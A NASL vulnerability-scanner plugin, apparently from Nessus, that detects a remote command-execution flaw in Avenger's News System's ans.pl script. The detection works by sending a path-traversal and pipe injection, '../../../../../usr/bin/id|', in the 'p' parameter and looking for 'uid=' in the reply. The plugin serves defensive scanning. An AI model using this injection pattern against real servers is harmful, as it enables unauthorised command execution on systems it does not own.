if(description)
{
 script_id(10875);
 script_version("$Revision: 1.5.2.2 $");
 script_bugtraq_id(4147);
 script_cve_id("CAN-2002-0307");
 
 name["english"] = "Avenger's News System Command Execution";
 script_name(english:name["english"]);
 
 desc["english"] = "
A security vulnerability in Avenger's News System (ANS) allows
command execution by remote attackers who have access to the ANS 
page.

Risk factor : High
Solution : see http://www.securiteam.com/unixfocus/5MP090A6KG.html";

 script_description(english:desc["english"]);
 
 summary["english"] = "Avenger's News System Command Execution";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2002 SecurITeam");
 family["english"] = "CGI abuses";
 script_family(english:family["english"]);
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

# Check starts here

include("http_func.inc");


function check(req)
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  req = http_get(item:req, port:port);

  send(socket:soc, data:req);
  buf = http_recv(socket:soc);

  close(soc);

  if (("uid=" >< buf) && ("groups=" >< buf))
  {
   	security_hole(port:port);
	return(1);
  }
 }
  else exit(0);
  
 return(0);
}

port = get_kb_item("Services/www");
if(!port)port = 80;



cginameandpath[0] = string("/ans.pl?p=../../../../../usr/bin/id|&blah");
cginameandpath[1] = string("/ans/ans.pl?p=../../../../../usr/bin/id|&blah");
cginameandpath[2] = "";

i = 0;
if(get_port_state(port))
{
 for (i = 0; cginameandpath[i]; i = i + 1)
 { 
  url = cginameandpath[i];
  if(check(req:url))exit(0);
 }
}

#
# XXX we avoid to fork for nothing.
#
cgibin = cgibin();
cginameandpath[0] = string(cgibin) + string("/ans.pl?p=../../../../../usr/bin/id|&blah");
cginameandpath[1] = string(cgibin) + string("/ans/ans.pl?p=../../../../../usr/bin/id|&blah");
cginameandpath[2] = "";

i = 0;
if(get_port_state(port))
{
 for (i = 0; cginameandpath[i]; i = i + 1)
 { 
  url = cginameandpath[i];
  if(check(req:url))exit(0);
 }
}
